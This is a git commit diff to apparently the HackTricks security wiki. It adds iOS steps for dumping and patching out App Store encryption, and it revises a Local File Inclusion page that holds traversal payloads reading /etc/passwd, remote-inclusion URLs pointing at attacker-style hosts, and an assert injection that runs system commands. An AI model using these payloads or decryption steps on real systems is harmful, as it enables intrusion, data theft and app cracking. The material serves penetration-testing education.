GitBook: [master] 3 pages and 8 assets modified

This commit is contained in:
CPol 2021-04-30 12:16:33 +00:00 committed by gitbook-bot
parent 8cb860d13c
commit c6787fa07b
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
9 changed files with 162 additions and 17 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 232 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 232 KiB

After

Width:  |  Height:  |  Size: 40 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 184 KiB

After

Width:  |  Height:  |  Size: 40 KiB

View file

Before

Width:  |  Height:  |  Size: 206 KiB

After

Width:  |  Height:  |  Size: 206 KiB

View file

Before

Width:  |  Height:  |  Size: 75 KiB

After

Width:  |  Height:  |  Size: 75 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 184 KiB

View file

@ -57,10 +57,80 @@ Note that **applications signed by the same signing certificate can share resour
## Obfuscation
Unlike an Android Application, the binary of an iOS app **can only be disassembled** and not decompiled.
When an application is submitted to the app store, Apple first verifies the app conduct and before releasing it to the app-store, **Apple encrypts the binary**. So the binary download from the app store is encrypted complicating ting the reverse-engineering tasks.
When an application is submitted to the app store, Apple first verifies the app conduct and before releasing it to the app-store, **Apple encrypts the binary using** [**FairPlay**](https://developer.apple.com/streaming/fps/). So the binary download from the app store is encrypted complicating ting the reverse-engineering tasks.
However, note that there are other **third party software that can be used to obfuscate** the resulting binaries.
### Removing App Store Encryption
In order to run the encrypted binary, the device needs to decrypt it in memory. Then, it's possible to **dump the decrypted binary from the memory**.
First, check if the binary is compiled with the PIE \(Position Independent Code\) flag:
```bash
otool -Vh Original_App #Check the last word of the last line of this code
Home:
Mach header
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
MH_MAGIC_64 X86_64 ALL 0x00 EXECUTE 47 6080 NOUNDEFS DYLDLINK TWOLEVEL PIE
```
If it's set you can use the script [`change_macho_flags.py`](https://chromium.googlesource.com/chromium/src/+/49.0.2623.110/build/mac/change_mach_o_flags.py) to remove it with python2:
```bash
python change_mach_o_flags.py --no-pie Original_App
otool -Vh Hello_World
Hello_World:
Mach header
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
MH_MAGIC ARM V7 0x00 EXECUTE 22 2356 NOUNDEFS DYLDLINK TWOLEVEL MH_NO_HEAP_EXECUTION
```
Now that the PIE flag isn't set, the OS will load the program at a **fixed starting location** every-time. In order to find this **location** you can use:
```bash
otool -l Original_App | grep -A 3 LC_SEGMENT | grep -A 1 __TEXT
segname __TEXT
vmaddr 0x00001000
```
Then, it's necessary to extract the the memory range that needs to be dumped:
```bash
otool -l Original_App | grep -A 4 LC_ENCRYPTION_INFO
cmd LC_ENCRYPTION_INFO
cmdsize 20
cryptoff 4096
cryptsize 4096
cryptid 0
```
The value of **`cryptoff`** indicated the starting address of the encrypted content and the **`cryptsize`** indicates the size of the encrypted content.
So, the `start address` to dump will be `vmaddr + cryptoff` and the `end address` will be the `start address + cryptsize`
In this case: `start_address = 0x1000 + 0x1000 = 0x2000` __and `end_address = 0x2000 + 0x1000 = 0x3000`
With this information it's just necessary to run the application in the jailbroken device, attach to the process with gdb \(`gdb -p <pid>`\) and dump the memory:
```bash
dump memory dump.bin 0x2000 0x3000
```
Congrats! You have decrypted the encrypted section in dump.bin. Now **transfer this dump to your computer and overwrite the encrypted section with the decrypted** one:
```bash
dd bs=1 seek=<starting_address> conv=notrunc if=dump.bin of=Original_App
```
There is one more step to complete. The application is still **indicating** in its metadata that it's **encrypted**, but it **isn't**. Then, when executed, the device will try to decrypt the already decrypted section and it's going to fail.
However, you can use tools like [**MachOView**](https://sourceforge.net/projects/machoview/) to change this info. Just open the binary and set the **cryptid** to 0:
![](../.gitbook/assets/image%20%28458%29.png)
### Removing App Store Encryption Automatically
You can use tools like [**Clutch**](https://github.com/KJCracks/Clutch) to automatically remove the encryption and an app.
## IPA Reversing
`.ipa` files are zipped packages, so change the extension to `.zip` and decompress them. After decompressing them you should see an `.app` folder. This **folder contains the files of the application**.
@ -88,7 +158,77 @@ DVIA-v2:
[...]
```
#### Check if the app is encrypted
See if there is any output for:
```bash
otool -l <app-binary> | grep -A 4 LC_ENCRYPTION_INFO
```
#### Disassembling the binary
Disassemble the text section:
```bash
otool -tV DVIA-v2
DVIA-v2:
(__TEXT,__text) section
+[DDLog initialize]:
0000000100004ab8 sub sp, sp, #0x60
0000000100004abc stp x29, x30, [sp, #0x50] ; Latency: 6
0000000100004ac0 add x29, sp, #0x50
0000000100004ac4 sub x8, x29, #0x10
0000000100004ac8 mov x9, #0x0
0000000100004acc adrp x10, 1098 ; 0x10044e000
0000000100004ad0 add x10, x10, #0x268
```
To print the **Objective-C segment** of the sample application one can use:
```bash
otool -oV DVIA-v2
DVIA-v2:
Contents of (__DATA,__objc_classlist) section
00000001003dd5b8 0x1004423d0 _OBJC_CLASS_$_DDLog
isa 0x1004423a8 _OBJC_METACLASS_$_DDLog
superclass 0x0 _OBJC_CLASS_$_NSObject
cache 0x0 __objc_empty_cache
vtable 0x0
data 0x1003de748
flags 0x80
instanceStart 8
```
In order to obtain a more compact Objective-C code you can use [**class-dump**](http://stevenygard.com/projects/class-dump/):
```bash
class-dump some-app
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#pragma mark Named Structures
struct CGPoint {
double _field1;
double _field2;
};
struct CGRect {
struct CGPoint _field1;
struct CGSize _field2;
};
struct CGSize {
double _field1;
double _field2;
};
```
However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download_freeware/).
## Testing

View file

@ -45,7 +45,7 @@ Check the LFI list of linux.
## Basic LFI and bypasses
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=http://myserver.com/phpshellcode.txt\).
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\).
```text
http://example.com/index.php?page=../../../etc/passwd
@ -130,7 +130,7 @@ http://example.com/index.php?page=\\attacker.com\shared\mal.php
## Top 25 parameters
Heres list of top 25 parameters that could be vulnerable to local file inclusion \(LFI\) vulnerabilities \(from [link](https://twitter.com/trbughunters/status/1279768631845494787)\):
Heres list of top 25 parameters that could be vulnerable to local file inclusion \(LFI\) vulnerabilities \(from [link](https://twitter.com/trbughunters/status/1279768631845494787)\):
```text
?cat={payload}
@ -255,7 +255,7 @@ And you can compile the `phar` executing the following line:
php --define phar.readonly=0 create_path.php
```
A file called `test.phar` will be generated that you can use to abuse the LFI.
A file called `test.phar` will be generated that you can use to abuse the LFI.
If the LFI is just reading the file and not executing the php code inside of it, for example using functions like _**file\_get\_contents\(\), fopen\(\), file\(\) or file\_exists\(\), md5\_file\(\), filemtime\(\) or filesize\(\)**_**.** You can try to abuse a **deserialization** occurring when **reading** a **file** using the **phar** protocol.
For more information read the following post:
@ -267,17 +267,23 @@ For more information read the following post:
If you encounter a difficult LFI that appears to be filtering traversal strings such as ".." and responding with something along the lines of "Hacking attempt" or "Nice try!", an 'assert' injection payload may work.
A payload like this:
```
```text
' and die(show_source('/etc/passwd')) or '
```
will successfully exploit PHP code for a "file" parameter that looks like this:
```
```text
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
```
It's also possible to get RCE in a vulnerable "assert" statement using the system() function:
```
It's also possible to get RCE in a vulnerable "assert" statement using the system\(\) function:
```text
' and die(system("whoami")) or '
```
Be sure to URL-encode payloads before you send them.
## LFI2RCE
@ -342,7 +348,7 @@ Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
In PHP these sessions are stored into _/var/lib/php5/sess\_\[PHPSESSID\]_ files
In PHP these sessions are stored into _/var/lib/php5/sess\_\[PHPSESSID\]\_ files
```text
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
@ -377,13 +383,13 @@ To exploit this vulnerability you need: **A LFI vulnerability, a page where phpi
**Tutorial HTB**: [https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s](https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s)
You need to fix the exploit \(change **=&gt;** for **=&gt;**\). To do so you can do:
You need to fix the exploit \(change **=&gt;** for **=&gt;**\). To do so you can do:
```text
sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py
```
You have to change also the **payload** at the beginning of the exploit \(for a php-rev-shell for example\), the **REQ1** \(this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1\r_\), and **LFIREQ** \(this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char\)
You have to change also the **payload** at the beginning of the exploit \(for a php-rev-shell for example\), the **REQ1** \(this should point to the phpinfo page and should have the padding included, i.e.: _REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1\r_\), and **LFIREQ** \(this should point to the LFI vulnerability, i.e.: _LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r --_ Check the double "%" when exploiting null char\)
{% file src="../../.gitbook/assets/lfi-with-phpinfo-assistance.pdf" %}
@ -393,7 +399,7 @@ If uploads are allowed in PHP and you try to upload a file, this files is stored
Then, if have found a LFI vulnerability in the web server you can try to guess the name of the temporary file created and exploit a RCE accessing the temporary file before it is deleted.
In **Windows** the files are usually stored in **C:\Windows\temp\php&lt;&lt;**
In **Windows** the files are usually stored in **C:\Windows\temp\php&lt;&lt;**
In **linux** the name of the file use to be **random** and located in **/tmp**. As the name is random, it is needed to **extract from somewhere the name of the temporal file** and access it before it is deleted. This can be done reading the value of the **variable $\_FILES** inside the content of the function "**phpconfig\(\)**".
@ -430,6 +436,5 @@ print('[x] Something went wrong, please try again')
[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
[PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders)
{% file src="../../.gitbook/assets/en-local-file-inclusion-1.pdf" %}

View file

@ -21,7 +21,7 @@
* **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application \(so usually, a pod run just 1 container\). The pod is the way kubernetes abstracts the container technology running.
* **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** \(with a different internal IP\) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
![](../../.gitbook/assets/image%20%28466%29.png)
![](../../.gitbook/assets/image%20%28467%29.png)
* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods \(through API server\). The kubelet doesnt manage containers that were not created by Kubernetes.
* **Kube-proxy**: is the service in charge of the communications \(services\) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
@ -143,7 +143,7 @@ kubectl apply -f deployment.yml
Each configuration file has 3 parts: **metadata**, **specification** \(what need to be launch\), **status** \(desired state\).
Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
![](../../.gitbook/assets/image%20%28458%29.png)
![](../../.gitbook/assets/image%20%28458%29%20%281%29.png)
#### Example of Deployment + Service declared in the same configuration file \(from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)\)